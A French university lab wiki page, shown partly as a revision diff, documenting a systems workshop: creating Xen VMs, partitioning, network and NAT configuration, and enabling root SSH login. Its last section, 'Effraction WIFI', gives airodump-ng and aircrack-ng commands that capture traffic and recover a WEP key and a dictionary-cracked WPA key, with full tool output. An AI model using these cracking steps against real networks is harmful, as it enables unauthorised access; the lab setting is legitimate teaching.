« Atelier SysRes SE4 2025/2026 E6 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
Aucun résumé des modifications
Ligne 65 : Ligne 65 :
</syntaxhighlight>On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:<syntaxhighlight lang="cfg">
</syntaxhighlight>On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:<syntaxhighlight lang="cfg">
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']
</syntaxhighlight>Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique :<syntaxhighlight lang="bash">
</syntaxhighlight>Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:<syntaxhighlight lang="bash">
auto lo                                                                             
auto lo                                                                             
iface lo inet loopback                                                               
iface lo inet loopback                                                               
Ligne 78 : Ligne 78 :
         gateway 193.48.57.162                                                       
         gateway 193.48.57.162                                                       
iface eth1 inet6 auto                                                               
iface eth1 inet6 auto                                                               
</syntaxhighlight>On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)
==== Masquerade et ssh ====
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24
</syntaxhighlight>Après avoir sauvegarder avec iptables-save, on décommente dans  <code>/etc/sysctl.conf</code>:<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="bash">
PermitRootLogin yes
</syntaxhighlight>Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :<syntaxhighlight lang="bash">
ssh root@193.48.57.166 #pour la machine mandataire
ssh root@193.48.57.166 -p 2202 # pour la machine de service
</syntaxhighlight>
</syntaxhighlight>


=== Effraction WIFI ===
==== Effraction WIFI ====
<syntaxhighlight lang="bash">
<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
sudo airodump-ng wlan1

Version du 27 février 2026 à 12:35

Compte rendu :

Création du bridge dans capbreton

Avant de créer nos VM, on ajoute notre bridge à capbreton dans SE42026_cpayet_tdelobel

auto pont_pacman
iface pont_pacman inet manual
    bridge_ports none
    up ip link set $IFACE up
    down ip link set $IFACE down

On utilise ifup pour le démarrer.

Création des VMs

Pour créer la VM de service et mandataire, on utilise les commandes suivantes

xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force

Manjaro sera la machine de service et LinusTorvalds la mandataire Puis

xen create /etc/xen/SE4.Manjaro.cfg
xen create /etc/xen/SE4.LinusTorvalds.cfg

Nos machines sont maintenant listées.

Partitionnement

Sur capbreton

Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :

lvcreate -n SE4.Manjaro.var -L 10G virtual

On ajoute dans /etc/xen/SE4.Manjaro.cfg :

disk = [
            [...],
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'
        ]
Sur la VM

Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :

/dev/xvda3 /var ext4 defaults 0 2
/dev/xvdb1 /home ext4 defaults 0 2

Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)

mkfs -t ext4 /dev/xvda3
mkfs -t ext4 /dev/xvdb1
mount /dev/xvda3 /mnt
mv /var/* /mnt
umount /mnt
mount -a

On peut maintenant relancer la machine pour verifier si la config reste.

Enfin on répète le même schéma pour la machine mandataire.

Adresses ipv4 et ipv6

Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 192.168.10.2/24
    gateway 192.168.10.1

auto eth1
iface eth1 inet6 auto

On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:

vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']

Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:

auto lo                                                                             
iface lo inet loopback                                                              

auto eth0                                                                           
iface eth0 inet static                                                              
        address 192.168.10.1/24                                                     

auto eth1                                                                           
iface eth1 inet static                                                              
        address 193.48.57.166/24                                                    
        gateway 193.48.57.162                                                       
iface eth1 inet6 auto

On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)

Masquerade et ssh

Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :

iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24

Après avoir sauvegarder avec iptables-save, on décommente dans /etc/sysctl.conf:

net.ipv4.ip_forward=1

Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans /etc/ssh/sshd_config :

PermitRootLogin yes

Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :

ssh root@193.48.57.166 #pour la machine mandataire
ssh root@193.48.57.166 -p 2202 # pour la machine de service

Effraction WIFI

sudo airodump-ng wlan1

On trouve cracotte06 avec son adresse et son chanel

sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4

Le fichier dump étant crée, on récupère la clé avec la commande suivante :

sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap
                                                                                     Aircrack-ng 1.7 


                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)

   KB    depth   byte(vote)
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) 
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) 
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) 
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) 
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) 

             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] 
	Decrypted correctly: 100%
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap
                               Aircrack-ng 1.7 

      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) 

      Time left: 13 minutes, 48 seconds                         66.97%

                           KEY FOUND! [ 66684666 ]


      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD 
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00